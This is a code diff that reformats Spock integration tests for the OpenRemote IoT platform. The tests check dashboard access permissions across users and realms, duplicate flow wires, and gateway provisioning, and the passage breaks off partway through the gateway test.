+    def noAccessDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, noAccessUserToken).proxy(DashboardResource.class)
+    def readonlyDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, readonlyUserToken).proxy(DashboardResource.class)
+    def alternativeUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM, alternativeUserToken).proxy(DashboardResource.class)
+    def publicUserDashboardResource = getClientApiTarget(serverUri, MASTER_REALM).proxy(DashboardResource.class)
+    def smartcityDashboardResource = getClientApiTarget(serverUri, keycloakTestSetup.realmCity.name, smartcityUserAccessToken).proxy(DashboardResource.class)
+    def adminUserAssetResource = getClientApiTarget(serverUri, MASTER_REALM, adminUserAccessToken).proxy(AssetResource.class)
+
+    /* ----------------------- */
+
+    // Test to verify dashboards can be CREATED and FETCHED by different users.
+
+    when: "a user without WRITE_INSIGHTS tries to create dashboard"
+    DashboardScreenPreset[] tempScreenPresets = Arrays.asList(new DashboardScreenPreset("preset1", DashboardScalingPreset.KEEP_LAYOUT)).toArray() as DashboardScreenPreset[]
+    Dashboard temp1NoAccess = new Dashboard(MASTER_REALM, "dashboard1", tempScreenPresets, noAccessUser.id)
+    noAccessDashboardResource.create(null, temp1NoAccess)
+
+    then: "an exception is thrown that reflects their permissions"
+    thrown ForbiddenException
+
+    when: "a user without WRITE_INSIGHTS, but with READ_INSIGHTS, tries to create dashboard"
+    Dashboard temp1Readonly = new Dashboard(MASTER_REALM, "dashboard1", tempScreenPresets, readonlyUser.id)
+    readonlyDashboardResource.create(null, temp1Readonly)
+
+    then: "an exception is also thrown"
+    thrown ForbiddenException
+
+    when: "a dashboard is created in the authenticated realm"
+    DashboardScreenPreset[] screenPresets = Arrays.asList(new DashboardScreenPreset("preset1", DashboardScalingPreset.KEEP_LAYOUT)).toArray() as DashboardScreenPreset[]
+    Dashboard temp1 = new Dashboard(MASTER_REALM, "dashboard1", screenPresets, adminUser.id)
+    adminUserDashboardResource.create(null, temp1)
+    Dashboard temp2 = new Dashboard(MASTER_REALM, "dashboard2", screenPresets, adminUser.id).setOwnerId(keycloakTestSetup.testuser1Id)
+    privateUser1DashboardResource.create(null, temp2)
+
+    then: "requesting the dashboard should return the same object"
+    def adminDashboards = adminUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    def adminDashboard = adminDashboards[0]
+    def privateUser1Dashboard = adminDashboards[1]
+    assert adminDashboards.length == 2
+    def userDashboards = privateUser1DashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    assert userDashboards.length == 2
+    assert adminDashboard.id == userDashboards[0].id
+    assert privateUser1Dashboard.id == userDashboards[1].id
+
+    when: "a user without READ_INSIGHTS tries to fetch all realm dashboards"
+    def readonlyDashboards = noAccessDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
 
-        when: "a user without READ_INSIGHTS tries to fetch all realm dashboards"
-        def readonlyDashboards = noAccessDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    then: "none are returned"
+    assert readonlyDashboards.length == 0
 
-        then: "none are returned"
-        assert readonlyDashboards.length == 0
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify user can query by displayName
 
-        // Test to verify user can query by displayName
+    when: "admin user tries to query dashboard by display name"
+    def displayNameQuery = new DashboardQuery().names("dashboard1")
+    def dashboards = adminUserDashboardResource.query(null, displayNameQuery)
 
-        when: "admin user tries to query dashboard by display name"
-        def displayNameQuery = new DashboardQuery().names("dashboard1")
-        def dashboards = adminUserDashboardResource.query(null, displayNameQuery)
+    then: "the correct dashboard should be returned"
+    assert dashboards.length == 1
+    assert dashboards[0].displayName == "dashboard1"
+    assert dashboards[0].access == DashboardAccess.SHARED
 
-        then: "the correct dashboard should be returned"
-        assert dashboards.length == 1
-        assert dashboards[0].displayName == "dashboard1"
-        assert dashboards[0].access == DashboardAccess.SHARED
+    when: "a user without READ_INSIGHTS tries to query dashboard by display name"
+    dashboards = noAccessDashboardResource.query(null, displayNameQuery)
 
-        when: "a user without READ_INSIGHTS tries to query dashboard by display name"
-        dashboards = noAccessDashboardResource.query(null, displayNameQuery)
+    then: "no dashboards are returned"
+    assert dashboards.length == 0
 
-        then: "no dashboards are returned"
-        assert dashboards.length == 0
+    when: "an unauthenticated user tries to query dashboard by display name"
+    dashboards = publicUserDashboardResource.query(null, displayNameQuery)
 
-        when: "an unauthenticated user tries to query dashboard by display name"
-        dashboards = publicUserDashboardResource.query(null, displayNameQuery)
+    then: "no public dashboards with the display name could be found"
+    assert dashboards.length == 0
 
-        then: "no public dashboards with the display name could be found"
-        assert dashboards.length == 0
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify access logic
 
-        // Test to verify access logic
+    when: "a dashboard is updated from a different realm"
+    privateUser1Dashboard.setDisplayName("New displayname")
+    privateUser1Dashboard = smartcityDashboardResource.update(null, privateUser1Dashboard)
 
-        when: "a dashboard is updated from a different realm"
-        privateUser1Dashboard.setDisplayName("New displayname")
-        privateUser1Dashboard = smartcityDashboardResource.update(null, privateUser1Dashboard)
+    then: "an forbidden exception is thrown for not having cross-realm access"
+    thrown ForbiddenException
 
-        then: "an forbidden exception is thrown for not having cross-realm access"
-        thrown ForbiddenException
+    when: "a shared dashboard is updated by a different user"
+    privateUser1Dashboard = alternativeUserDashboardResource.update(null, privateUser1Dashboard)
 
-        when: "a shared dashboard is updated by a different user"
-        privateUser1Dashboard = alternativeUserDashboardResource.update(null, privateUser1Dashboard)
+    then: "the update succeeds as it is shared across the realm"
+    def alternativeUpdatedDashboard = alternativeUserDashboardResource.get(null, MASTER_REALM, privateUser1Dashboard.id)
+    assert alternativeUpdatedDashboard.setDisplayName("New displayname 2")
 
-        then: "the update succeeds as it is shared across the realm"
-        def alternativeUpdatedDashboard = alternativeUserDashboardResource.get(null, MASTER_REALM, privateUser1Dashboard.id)
-        assert alternativeUpdatedDashboard.setDisplayName("New displayname 2")
+    /* ----------- */
 
-        /* ----------- */
+    when: "the user without READ_INSIGHTS and WRITE_INSIGHTS tries to retrieve the shared dashboard"
+    noAccessDashboardResource.get(null, MASTER_REALM, privateUser1Dashboard.id)
 
-        when: "the user without READ_INSIGHTS and WRITE_INSIGHTS tries to retrieve the shared dashboard"
-        noAccessDashboardResource.get(null, MASTER_REALM, privateUser1Dashboard.id)
+    then: "a not found exception should be thrown"
+    thrown NotFoundException
 
-        then: "a not found exception should be thrown"
-        thrown NotFoundException
+    /* ----------- */
 
-        /* ----------- */
+    when: "dashboard1 is made 'private' by its original owner"
+    privateUser1Dashboard.setAccess(DashboardAccess.PRIVATE)
+    privateUser1Dashboard = privateUser1DashboardResource.update(null, privateUser1Dashboard)
 
-        when: "dashboard1 is made 'private' by its original owner"
-        privateUser1Dashboard.setAccess(DashboardAccess.PRIVATE)
-        privateUser1Dashboard = privateUser1DashboardResource.update(null, privateUser1Dashboard)
+    then: "the dashboard should have been updated"
+    privateUser1Dashboard != null
 
-        then: "the dashboard should have been updated"
-        privateUser1Dashboard != null
+    when: "all dashboards of the original owner are retrieved"
+    dashboards = privateUser1DashboardResource.getAllRealmDashboards(null, MASTER_REALM)
 
-        when: "all dashboards of the original owner are retrieved"
-        dashboards = privateUser1DashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    then: "dashboard1 is actually private"
+    assert dashboards.length == 2
+    assert dashboards.find((d) -> d.id == privateUser1Dashboard.id).access == DashboardAccess.PRIVATE
 
-        then: "dashboard1 is actually private"
-        assert dashboards.length == 2
-        assert dashboards.find((d) -> d.id == privateUser1Dashboard.id).access == DashboardAccess.PRIVATE
+    /* ----------- */
 
-        /* ----------- */
+    when: "a user tries to update another user's private dashboard"
+    privateUser1Dashboard.setDisplayName("another displayname")
+    privateUser1Dashboard = adminUserDashboardResource.update(null, privateUser1Dashboard)
 
-        when: "a user tries to update another user's private dashboard"
-        privateUser1Dashboard.setDisplayName("another displayname")
-        privateUser1Dashboard = adminUserDashboardResource.update(null, privateUser1Dashboard)
+    then: "it should throw an exception"
+    thrown NotFoundException
 
-        then: "it should throw an exception"
-        thrown NotFoundException
+    /* ----------- */
 
-        /* ----------- */
+    when: "a user makes a dashboard query for a name that matches a another user's private dashboard"
+    def adminDisplaynameDashboards = adminUserDashboardResource.query(null, new DashboardQuery().names(privateUser1Dashboard.displayName))
 
-        when: "a user makes a dashboard query for a name that matches a another user's private dashboard"
-        def adminDisplaynameDashboards = adminUserDashboardResource.query(null, new DashboardQuery().names(privateUser1Dashboard.displayName))
+    then: "the dashboard should not be returned"
+    assert adminDisplaynameDashboards.length == 0
 
-        then: "the dashboard should not be returned"
-        assert adminDisplaynameDashboards.length == 0
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify private dashboards cannot be fetched by public/unauthenticated users, even if ID is specified
 
-        // Test to verify private dashboards cannot be fetched by public/unauthenticated users, even if ID is specified
+    when: "when a public user specifically fetches a private dashboard"
+    publicUserDashboardResource.get(null, MASTER_REALM, adminDashboard.id)
 
-        when: "when a public user specifically fetches a private dashboard"
-        publicUserDashboardResource.get(null, MASTER_REALM, adminDashboard.id)
+    then: "a not found exception should be thrown"
+    thrown NotFoundException
 
-        then: "a not found exception should be thrown"
-        thrown NotFoundException
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify "DELETE" logic
 
-        // Test to verify "DELETE" logic
+    when: "admin user updates his dashboard to be private"
+    adminDashboard.setAccess(DashboardAccess.PRIVATE)
+    adminDashboard = adminUserDashboardResource.update(null, adminDashboard)
 
-        when: "admin user updates his dashboard to be private"
-        adminDashboard.setAccess(DashboardAccess.PRIVATE)
-        adminDashboard = adminUserDashboardResource.update(null, adminDashboard)
+    and: "a different user tries to delete a dashboard he doesn't own"
+    privateUser1DashboardResource.delete(null, MASTER_REALM, adminDashboard.id)
 
-        and: "a different user tries to delete a dashboard he doesn't own"
-        privateUser1DashboardResource.delete(null, MASTER_REALM, adminDashboard.id)
+    then: "it should throw a NOT_FOUND exception, since it isn't visible to him"
+    thrown NotFoundException
 
-        then: "it should throw a NOT_FOUND exception, since it isn't visible to him"
-        thrown NotFoundException
+    when: "admin user makes his dashboard SHARED again"
+    adminDashboard.setAccess(DashboardAccess.SHARED)
+    adminDashboard = adminUserDashboardResource.update(null, adminDashboard)
 
-        when: "admin user makes his dashboard SHARED again"
-        adminDashboard.setAccess(DashboardAccess.SHARED)
-        adminDashboard = adminUserDashboardResource.update(null, adminDashboard)
+    and: "a different user tries to delete the dashboard again"
+    privateUser1DashboardResource.delete(null, MASTER_REALM, adminDashboard.id)
 
-        and: "a different user tries to delete the dashboard again"
-        privateUser1DashboardResource.delete(null, MASTER_REALM, adminDashboard.id)
+    then: "it should succeed, and the dashboard cannot be retrieved by the admin again"
+    assert adminUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM).find {
+      it.id === adminDashboard.id
+    } == null
 
-        then: "it should succeed, and the dashboard cannot be retrieved by the admin again"
-        assert adminUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM).find { it.id === adminDashboard.id } == null
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify public/unauthenticated user cannot fetch dashboards by default
 
-        // Test to verify public/unauthenticated user cannot fetch dashboards by default
+    when: "dashboards are requested by a public user"
+    def publicDashboards1 = publicUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
 
-        when: "dashboards are requested by a public user"
-        def publicDashboards1 = publicUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    then: "it should return an empty array"
+    assert publicDashboards1.length == 0
 
-        then: "it should return an empty array"
-        assert publicDashboards1.length == 0
+    /* ----------------------- */
 
-        /* ----------------------- */
+    // Test to verify public dashboards CAN be fetched by public/unauthenticated users
 
-        // Test to verify public dashboards CAN be fetched by public/unauthenticated users
+    when: "dashboard1 is made 'public' by its original owner"
+    privateUser1Dashboard.setAccess(DashboardAccess.PUBLIC)
+    privateUser1Dashboard.setDisplayName("Public dashboard")
+    privateUser1Dashboard = privateUser1DashboardResource.update(null, privateUser1Dashboard) != null
 
-        when: "dashboard1 is made 'public' by its original owner"
-        privateUser1Dashboard.setAccess(DashboardAccess.PUBLIC)
-        privateUser1Dashboard.setDisplayName("Public dashboard")
-        privateUser1Dashboard = privateUser1DashboardResource.update(null, privateUser1Dashboard) != null
+    then: "the now public dashboard should be available to anonymous users"
+    def publicDashboards2 = publicUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
+    assert publicDashboards2.length == 1
+    assert publicDashboards2[0].access == DashboardAccess.PUBLIC
+    assert publicDashboards2[0].displayName == "Public dashboard"
 
-        then: "the now public dashboard should be available to anonymous users"
-        def publicDashboards2 = publicUserDashboardResource.getAllRealmDashboards(null, MASTER_REALM)
-        assert publicDashboards2.length == 1
-        assert publicDashboards2[0].access == DashboardAccess.PUBLIC
-        assert publicDashboards2[0].displayName == "Public dashboard"
+    and: "all users should be able to fetch the public dashboard"
+    assert adminUserDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
+    assert privateUser1DashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
+    assert noAccessDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
+    assert readonlyDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
+    assert alternativeUserDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
 
-        and: "all users should be able to fetch the public dashboard"
-        assert adminUserDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
-        assert privateUser1DashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
-        assert noAccessDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
-        assert readonlyDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
-        assert alternativeUserDashboardResource.get(null, MASTER_REALM, publicDashboards2[0].id).displayName == publicDashboards2[0].displayName
+    /* ------------------------- */
 
-        /* ------------------------- */
+    // Test to check whether dashboards are queried when no assets are accessible
 
-        // Test to check whether dashboards are queried when no assets are accessible
-
-        when: "a new asset is created in the building realm"
-        def lightAsset = new LightAsset("admin light").setRealm(keycloakTestSetup.realmBuilding.name)
-        lightAsset.getAttribute("brightness").ifPresent {
-            it -> it.addMeta(new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ))
-        }
-        def adminLightAsset = adminUserAssetResource.create(null, lightAsset)
-
-        and: "a dashboard is created in the building realm using that asset"
-        def gridItem = new DashboardGridItem().setX(0).setY(0).setW(1).setH(1)
-        def widgetConfigStr = ('{"attributeRefs":[{"id":"assetId","name":"brightness"}]}').replace("assetId", adminLightAsset.id)
-        def widget = new DashboardWidget()
-                .setDisplayName("Light widget")
-                .setWidgetTypeId("test")
-                .setGridItem(gridItem)
-                .setWidgetConfig(ValueUtil.parse(widgetConfigStr, Object.class).orElse(null))
-        def template = new DashboardTemplate(screenPresets)
-                .setWidgets(new DashboardWidget[]{ widget })
-        def buildingDashboard = new Dashboard()
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setDisplayName("Dashboard with assets")
-                .setTemplate(template)
-                .setAccess(DashboardAccess.SHARED)
-                .setOwnerId(adminUser.id)
-
-        def newDashboard = adminUserDashboardResource.create(null, buildingDashboard)
-
-        and: "a restricted user authenticates for the building realm"
-        def restrictedUser1AccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-        def restrictedUserDashboardResource = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.name, restrictedUser1AccessToken).proxy(DashboardResource.class)
-
-        and: "a restricted user tries to query a dashboard without access to the assets shown"
-        def restrictedDashboards = restrictedUserDashboardResource.getAllRealmDashboards(null, keycloakTestSetup.realmBuilding.name)
-
-        then: "it should only return that dashboard"
-        assert restrictedDashboards.length == 0
-
-        when: "the user gets access to the asset"
-        def assetStorageService = container.getService(AssetStorageService.class)
-        assetStorageService.storeUserAssetLinks(Arrays.asList(
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser3Id, adminLightAsset.getId())
-        ))
-
-        then: "the user is able to request the dashboard"
-        def restrictedDashboards2 = restrictedUserDashboardResource.getAllRealmDashboards(null, keycloakTestSetup.realmBuilding.name)
-        assert restrictedDashboards2.length == 1
-        assert restrictedDashboards2[0].displayName == "Dashboard with assets"
-
-
-        /* ------------------------- */
-
-        // Test for cross realm requests
-        when: "the admin superuser in master realm tries requesting a dashboard in the building realm"
-        def dashboardOtherRealmQuery = new DashboardQuery().realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-        def dashboardsInOtherRealm = adminUserDashboardResource.query(null, dashboardOtherRealmQuery)
-
-        then: "it returns the building realm dashboard"
-        assert dashboardsInOtherRealm.length == 1
-        assert dashboardsInOtherRealm[0].displayName == "Dashboard with assets"
-
-        when: "the private user in master realm tries requesting a dashboard in the building realm"
-        def sameDashboardOtherRealmQuery = new DashboardQuery().realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-        def sameDashboardsInOtherRealm = privateUser1DashboardResource.query(null, sameDashboardOtherRealmQuery)
-
-        then: "it should return 403 forbidden"
-        thrown ForbiddenException
-
-
-
-        /* ------------------------- */
-
-        // Test to delete the dashboard
-
-        when: "the admin user deletes the new dashboard"
-        adminUserDashboardResource.delete(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
-
-        and: "tries to get the dashboard again"
-        adminUserDashboardResource.get(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
-
-        then: "it cannot be found, since it got deleted"
-        thrown NotFoundException
-
-        when: "the restricted user tries to fetch the deleted dashboard"
-        restrictedUserDashboardResource.get(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
-
-        then: "it cannot be found as well, since it got deleted"
-        thrown NotFoundException
+    when: "a new asset is created in the building realm"
+    def lightAsset = new LightAsset("admin light").setRealm(keycloakTestSetup.realmBuilding.name)
+    lightAsset.getAttribute("brightness").ifPresent { it ->
+      it.addMeta(new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ))
     }
+    def adminLightAsset = adminUserAssetResource.create(null, lightAsset)
+
+    and: "a dashboard is created in the building realm using that asset"
+    def gridItem = new DashboardGridItem().setX(0).setY(0).setW(1).setH(1)
+    def widgetConfigStr = ('{"attributeRefs":[{"id":"assetId","name":"brightness"}]}').replace("assetId", adminLightAsset.id)
+    def widget = new DashboardWidget()
+            .setDisplayName("Light widget")
+            .setWidgetTypeId("test")
+            .setGridItem(gridItem)
+            .setWidgetConfig(ValueUtil.parse(widgetConfigStr, Object.class).orElse(null))
+    def template = new DashboardTemplate(screenPresets)
+            .setWidgets(new DashboardWidget[]{
+              widget
+            })
+    def buildingDashboard = new Dashboard()
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setDisplayName("Dashboard with assets")
+            .setTemplate(template)
+            .setAccess(DashboardAccess.SHARED)
+            .setOwnerId(adminUser.id)
+
+    def newDashboard = adminUserDashboardResource.create(null, buildingDashboard)
+
+    and: "a restricted user authenticates for the building realm"
+    def restrictedUser1AccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+    def restrictedUserDashboardResource = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.name, restrictedUser1AccessToken).proxy(DashboardResource.class)
+
+    and: "a restricted user tries to query a dashboard without access to the assets shown"
+    def restrictedDashboards = restrictedUserDashboardResource.getAllRealmDashboards(null, keycloakTestSetup.realmBuilding.name)
+
+    then: "it should only return that dashboard"
+    assert restrictedDashboards.length == 0
+
+    when: "the user gets access to the asset"
+    def assetStorageService = container.getService(AssetStorageService.class)
+    assetStorageService.storeUserAssetLinks(Arrays.asList(
+                    new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser3Id, adminLightAsset.getId())
+                    ))
+
+    then: "the user is able to request the dashboard"
+    def restrictedDashboards2 = restrictedUserDashboardResource.getAllRealmDashboards(null, keycloakTestSetup.realmBuilding.name)
+    assert restrictedDashboards2.length == 1
+    assert restrictedDashboards2[0].displayName == "Dashboard with assets"
+
+
+    /* ------------------------- */
+
+    // Test for cross realm requests
+    when: "the admin superuser in master realm tries requesting a dashboard in the building realm"
+    def dashboardOtherRealmQuery = new DashboardQuery().realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+    def dashboardsInOtherRealm = adminUserDashboardResource.query(null, dashboardOtherRealmQuery)
+
+    then: "it returns the building realm dashboard"
+    assert dashboardsInOtherRealm.length == 1
+    assert dashboardsInOtherRealm[0].displayName == "Dashboard with assets"
+
+    when: "the private user in master realm tries requesting a dashboard in the building realm"
+    def sameDashboardOtherRealmQuery = new DashboardQuery().realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+    def sameDashboardsInOtherRealm = privateUser1DashboardResource.query(null, sameDashboardOtherRealmQuery)
+
+    then: "it should return 403 forbidden"
+    thrown ForbiddenException
+
+
+
+    /* ------------------------- */
+
+    // Test to delete the dashboard
+
+    when: "the admin user deletes the new dashboard"
+    adminUserDashboardResource.delete(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
+
+    and: "tries to get the dashboard again"
+    adminUserDashboardResource.get(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
+
+    then: "it cannot be found, since it got deleted"
+    thrown NotFoundException
+
+    when: "the restricted user tries to fetch the deleted dashboard"
+    restrictedUserDashboardResource.get(null, keycloakTestSetup.realmBuilding.getName(), newDashboard.getId())
+
+    then: "it cannot be found as well, since it got deleted"
+    thrown NotFoundException
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/flow/FlowModelTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/flow/FlowModelTest.groovy
@@ -26,27 +26,25 @@ import spock.lang.Specification
 
 class FlowModelTest extends Specification implements ManagerContainerTrait {
 
-    def "Ignore duplicate wires"() {
+  def "Ignore duplicate wires"() {
 
-        given: "a flow"
-        Flow flow = new Flow("Test Flow", "123")
+    given: "a flow"
+    Flow flow = new Flow("Test Flow", "123")
 
-        when: "duplicate wires are added"
-        flow.addWire(new Wire("a", "b"))
-        flow.addWire(new Wire("a", "b"))
+    when: "duplicate wires are added"
+    flow.addWire(new Wire("a", "b"))
+    flow.addWire(new Wire("a", "b"))
 
-        then: "only one wire should be present"
-        flow.getWires().length == 1
+    then: "only one wire should be present"
+    flow.getWires().length == 1
+  }
 
-    }
+  def "Throw when duplicate constructor wires"() {
 
-    def "Throw when duplicate constructor wires"() {
+    when: "duplicate wires are provided as constructor arguments"
+    new Flow("foo", "123", new Node[0], [new Wire("a", "b"), new Wire("a", "b")] as Wire[])
 
-        when: "duplicate wires are provided as constructor arguments"
-        new Flow("foo", "123", new Node[0], [new Wire("a", "b"), new Wire("a", "b")] as Wire[])
-
-        then: "an exception should be thrown"
-        thrown(IllegalArgumentException)
-    }
-
+    then: "an exception should be thrown"
+    thrown(IllegalArgumentException)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/gateway/GatewayTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/gateway/GatewayTest.groovy
@@ -87,1387 +87,1586 @@ import static org.openremote.model.value.ValueType.*
 // TODO: Add tests for each supported version of the gateway API
 class GatewayTest extends Specification implements ManagerContainerTrait {
 
-    def "Gateway asset provisioning and local manager logic test"() {
+  def "Gateway asset provisioning and local manager logic test"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def gatewayService = container.getService(GatewayService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def identityProvider = container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def gatewayService = container.getService(GatewayService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def identityProvider = container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider
 
-        expect: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 300)
-        }
+    expect: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 300)
+    }
 
-        when: "a gateway is provisioned in this manager"
-        GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
-                .setRealm(managerTestSetup.realmBuildingName))
+    when: "a gateway is provisioned in this manager"
+    GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
+            .setRealm(managerTestSetup.realmBuildingName))
 
-        then: "a keycloak client should have been created for this gateway"
-        conditions.eventually {
-            def client = identityProvider.getClient(managerTestSetup.realmBuildingName, getGatewayClientId(gateway.getId()))
-            assert client != null
-        }
+    then: "a keycloak client should have been created for this gateway"
+    conditions.eventually {
+      def client = identityProvider.getClient(managerTestSetup.realmBuildingName, getGatewayClientId(gateway.getId()))
+      assert client != null
+    }
 
-        and: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
-            assert !isNullOrEmpty(gateway.getClientId().orElse(""))
-            assert !isNullOrEmpty(gateway.getClientSecret().orElse(""))
-        }
+    and: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
+      assert !isNullOrEmpty(gateway.getClientId().orElse(""))
+      assert !isNullOrEmpty(gateway.getClientSecret().orElse(""))
+    }
 
-        and: "a gateway connector should have been created for this gateway"
-        conditions.eventually {
-            assert gatewayService.gatewayConnectorMap.size() == 1
-            assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
-        }
+    and: "a gateway connector should have been created for this gateway"
+    conditions.eventually {
+      assert gatewayService.gatewayConnectorMap.size() == 1
+      assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
+    }
 
-        when: "the gateway service user credentials are used to try and access the asset resources"
-        def accessToken = authenticate(
+    when: "the gateway service user credentials are used to try and access the asset resources"
+    def accessToken = authenticate(
             container,
             managerTestSetup.realmBuildingName,
             gateway.getClientId().orElse(""),
             gateway.getClientSecret().orElse("")
-        )
-        def assetResource = getClientApiTarget(serverUri(serverPort), managerTestSetup.realmBuildingName, accessToken).proxy(AssetResource.class)
+            )
+    def assetResource = getClientApiTarget(serverUri(serverPort), managerTestSetup.realmBuildingName, accessToken).proxy(AssetResource.class)
 
-        and: "the realm assets are requested"
-        def realmAssets = assetResource.queryAssets(null, null)
+    and: "the realm assets are requested"
+    def realmAssets = assetResource.queryAssets(null, null)
 
-        then: "an exception should be thrown"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable {
-           assert ex.response.status == 403
-           true
-        }
+    then: "an exception should be thrown"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable {
+      assert ex.response.status == 403
+      true
+    }
 
-        when: "the Gateway client is created"
-        def gatewayClient = new WebsocketIOClient(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=$managerTestSetup.realmBuildingName").build(),
-                null,
-                new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/$managerTestSetup.realmBuildingName/protocol/openid-connect/token",
-                        gateway.getClientId().orElse(""),
-                        gateway.getClientSecret().orElse(""),
-                        null).setBasicAuthHeader(true))
-        gatewayClient.setEncoderDecoderProvider({
-            [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, gatewayClient)].toArray(new ChannelHandler[0])
-        })
+    when: "the Gateway client is created"
+    def gatewayClient = new WebsocketIOClient(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=$managerTestSetup.realmBuildingName").build(),
+            null,
+            new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/$managerTestSetup.realmBuildingName/protocol/openid-connect/token",
+            gateway.getClientId().orElse(""),
+            gateway.getClientSecret().orElse(""),
+            null).setBasicAuthHeader(true))
+    gatewayClient.setEncoderDecoderProvider({
+      [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, gatewayClient)].toArray(new ChannelHandler[0])
+    })
 
-        and: "we add callback consumers to the client"
-        def connectionStatus = gatewayClient.getConnectionStatus()
-        List<String> clientReceivedMessages = new CopyOnWriteArrayList<>()
-        gatewayClient.addMessageConsumer({message ->
-           getLOG().info("Message received from central manager: $message")
-           clientReceivedMessages.add(message as String)
-        })
-        gatewayClient.addConnectionStatusConsumer({status ->
-           getLOG().info("Gateway client connection staus changed: $status")
-           connectionStatus = status
-        })
+    and: "we add callback consumers to the client"
+    def connectionStatus = gatewayClient.getConnectionStatus()
+    List<String> clientReceivedMessages = new CopyOnWriteArrayList<>()
+    gatewayClient.addMessageConsumer({message ->
+      getLOG().info("Message received from central manager: $message")
+      clientReceivedMessages.add(message as String)
